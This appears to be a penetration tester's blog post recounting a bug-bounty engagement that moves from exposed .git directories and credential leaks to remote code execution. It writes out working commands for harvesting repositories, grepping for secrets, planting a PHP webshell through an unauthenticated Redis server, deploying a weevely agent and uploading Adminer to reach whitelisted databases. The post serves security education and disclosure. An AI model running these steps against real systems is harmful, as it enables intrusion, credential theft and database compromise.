I would have bragged about an APT, but the characteristics depicted in this post strongly illustrate the "persistent" part and neither the "advanced" nor the "threat".
After this organization requested a bug hunt from a cybersecurity company I once worked for, I launched my terminal and took on the challenge.
I did the usual enumeration: domain and IP scans, directory discovery, web application assessments. The results were not that impressive, just a low-level directory listing flaw and a few unprotected .git directories.
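For context, that initial enumeration looked roughly like the sketch below; the target name and wordlist are placeholders, not the organization's real assets.

```
nmap -sV -p- --min-rate 1000 -oA scans/initial target.example.com      # full port and service scan
gobuster dir -u https://target.example.com \
  -w /usr/share/wordlists/dirb/common.txt -o scans/dirs.txt            # directory discovery
```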
I lost hope and just sent in the findings, under pressure and with time moving on. I was frustrated by the minimal discovery. Not all hope was gone though: the organization agreed to keep the bug hunt open with no fixed timeline.
Six months later, my psyche was revived once more. I decided to redo the whole enumeration from scratch. I soon discovered more .git misconfigurations and a more critical directory listing, through unrestricted access to the Apache server-status resource.
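Checking for that exposure is a one-liner; the hostname is a placeholder.

```
# Exposed Apache mod_status leaks client IPs and every URL being requested
curl -s https://target.example.com/server-status | grep -iE 'GET|POST'
```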
In the directory listing, I managed to find a couple of gems: bash scripts with DB credentials and API keys, plus Dockerfile and docker-compose.yml files also containing a couple of secrets.
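Once the listable directory is mirrored locally, a quick grep usually surfaces that kind of material; the patterns below are just illustrative.

```
wget -r -np -q https://target.example.com/exposed/ -P loot/            # mirror the listable directory
grep -rinE 'password|passwd|api[_-]?key|secret|token' loot/ | less     # hunt for credentials and keys
```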
From the misconfigured .git directory, I was able to work out the business logic by going through the harvested source code and configuration files, which contained even more DB credentials and, above all, a different domain owned by the organization that doesn't appear anywhere on Google. Deep OSINT is really important.
Git is a type of version control system; there are others, like Subversion (SVN). With an exposed or misconfigured .git or .svn directory, an attacker is in a position to harvest the full source code along with all the commits and commit messages.
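Harvesting one can be as simple as the sketch below, either with a dedicated tool like git-dumper or, when the directory itself is listable, a plain mirror followed by a checkout (hostnames and paths are placeholders).

```
# Option 1: dedicated tool
pip install git-dumper
git-dumper https://target.example.com/.git/ loot/app/

# Option 2: mirror the objects and rebuild the working tree (needs directory listing on .git)
wget -r -np -q https://target.example.com/.git/ -P loot/raw/
cd loot/raw/target.example.com && git checkout -- . && git log --oneline
```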
Armed with this info, I knew it wasn't enough for a persistent bug hunt, so I dug deeper. I tried using the credentials retrieved in the two discoveries above, but none of them worked; the connections just timed out. This pointed to a firewall rule that allowed only particular IPs to connect to these vital assets. At this point it was evident that if this info was going to be valuable in terms of the bug hunt, breaking into one of the whitelisted assets was the key to the kingdom.
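The difference between a clean "connection refused" and a silent timeout is what gave the filtering away; a quick reachability check (placeholder host and port) is enough to tell the two apart.

```
# A timeout, rather than an immediate refusal, usually means a firewall is dropping the packets
timeout 5 nc -vz db.target.example.com 3306 || echo "filtered or unreachable"
```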
The good thing is that I had another domain to continue my assessment with. Months down the line, I re-embarked on the mission. This time around I didn't start from the beginning, as I had a saved CherryTree document with all the previous findings.
Taking notes during an engagement is very important: you can pick up the operation at any time and continue, which saves you from always starting afresh. My go-to tool for note taking is, obviously, CherryTree.
The findings at this point were a lot of subdomains enumerated from the newly discovered domain (a larger attack surface) and more exposed .git directories containing even more critical secrets.
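Any passive subdomain enumeration tooling does the job here; subfinder and amass below are just examples, run against a placeholder domain.

```
subfinder -d newdomain.example -silent -o subs.txt
amass enum -passive -d newdomain.example -o subs_amass.txt
sort -u subs.txt subs_amass.txt > all_subs.txt      # merged, deduplicated attack surface
```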
Most nmap scan results led to HTTP-based services and inaccessible MQTT servers. One scan stood out though, turning up two extra services: a Redis caching service and a memcached service.
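Something along these lines is what flagged the extra services (hypothetical host; 6379 is Redis, 11211 is memcached, 1883 is MQTT):

```
nmap -sV -p 80,443,1883,6379,11211 -oN scans/services.txt host.newdomain.example
```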

The Redis server was definitely an older version, so I quickly set it up on the workstation at my house. I used Docker, and since there wasn't a ready-made Docker image for Redis 3.2.12, I decided to build one myself.
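A rough sketch of that build, assuming a base image that already ships a compiler (older Redis releases can be picky about newer toolchains, so the base image may need adjusting):

```
# Throwaway Redis 3.2.12 image built from the upstream source tarball
cat > Dockerfile <<'EOF'
FROM gcc:9
RUN wget -q http://download.redis.io/releases/redis-3.2.12.tar.gz && \
    tar xzf redis-3.2.12.tar.gz && cd redis-3.2.12 && \
    make && make install
EXPOSE 6379
CMD ["redis-server", "--protected-mode", "no"]
EOF
docker build -t redis-3.2.12-lab .
docker run -d -p 6379:6379 redis-3.2.12-lab
```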
On connecting with redis-cli -h <IP>, I quickly realized that the Redis server had been used to set a cron job that downloads, installs and runs a cryptominer mining Monero. Using a few threat hunting techniques, I quickly learned about the attacker and the technique they use to infect exposed, unauthenticated Redis servers and inject cryptominers.
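Poking around an open instance to spot that kind of infection looks roughly like this (the key name is a placeholder; real miner campaigns use a variety of them):

```
redis-cli -h <IP> INFO server          # version, uptime, OS
redis-cli -h <IP> CONFIG GET dir       # where dumps get written (e.g. a cron spool directory)
redis-cli -h <IP> --scan               # list keys without blocking the server
redis-cli -h <IP> GET backup1          # inspect suspicious keys for cron/miner payloads
```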

A subsequent article will contain a write-up of all the techniques used to infect Redis servers and achieve RCE.
In the back of my mind I was confident that this should lead to RCE, but I kept getting permission denied when attempting a couple of techniques to get RCE through the server's cron jobs.
The technique is simple: after connecting to the Redis server with redis-cli, you change the configured directory, set the database filename to something like backdoor.php, then inject PHP backdoor code into the database. PHP is a lenient language and will ignore all the other Redis garbage in the file and execute just the PHP code. Boom, sounds like a plan. The problem was that at this point I couldn't write to the crontab file, because Redis was running with limited privileges.
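For reference, the webroot variant of that trick looks like the sketch below. The IP and webroot path are placeholders, and it only works when Redis can write there and the full path is known.

```
redis-cli -h <IP> CONFIG SET dir /var/www/html         # point RDB dumps at the webroot (path is an assumption)
redis-cli -h <IP> CONFIG SET dbfilename backdoor.php   # the dump file doubles as a PHP script
redis-cli -h <IP> SET pwn '<?php system($_GET["cmd"]); ?>'
redis-cli -h <IP> SAVE                                 # write the dump; PHP skips the binary noise around the payload
# then: curl 'http://<IP>/backdoor.php?cmd=id'
```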
So I left it at that and stayed away for one or two more months. Then I picked up the mission again. This time around I checked the other HTTP services that I had initially left alone, on the same server that the Redis service runs on.
Git misconfiguration again: a config.ini file with the full path to a log directory, which disclosed the full filesystem path on the webserver. This web service was critical, as it was used to run a financial API endpoint. So I abused this info and injected a PHP backdoor, and voilà, it worked: RCE. I then generated a weevely webshell and had a full terminal experience on my target.
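The weevely step is the usual generate/connect flow; the password, agent name and URL below are placeholders.

```
weevely generate s3cr3tpass agent.php                    # build an obfuscated PHP agent locally
# drop agent.php into the webroot (e.g. via the Redis dump trick above), then connect:
weevely https://finapi.example.com/agent.php s3cr3tpass
```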


Recalling that earlier I had found some DB credentials that only allowed access from specific whitelisted IPs, I uploaded Adminer to the web server I now had shell access to, and successfully authenticated to a couple of databases.
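Adminer is a single PHP file, so it only needs to land in the webroot next to the agent. The module invocation below is from memory and the paths are assumptions; the same upload can be done from inside the interactive weevely session.

```
wget -q https://www.adminer.org/latest.php -O adminer.php
weevely https://finapi.example.com/agent.php s3cr3tpass ':file_upload adminer.php /var/www/html/adminer.php'
# browse to /adminer.php and authenticate with the harvested DB credentials
```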
I downloaded more projects from the server and soon realized that I was inside the organization's developer subnet.
I wrote up a responsible disclosure report and submitted the findings.
One and a half years of enumeration, frustration and pwnage. New skills learnt.
In the next article I'll get into the technical details behind parts of this post.
I'll talk about harvesting exposed .git directories, the different methods used to gain RCE on exposed, unauthenticated Redis servers, and present a tool to automate the pwnage.
Stay tuned.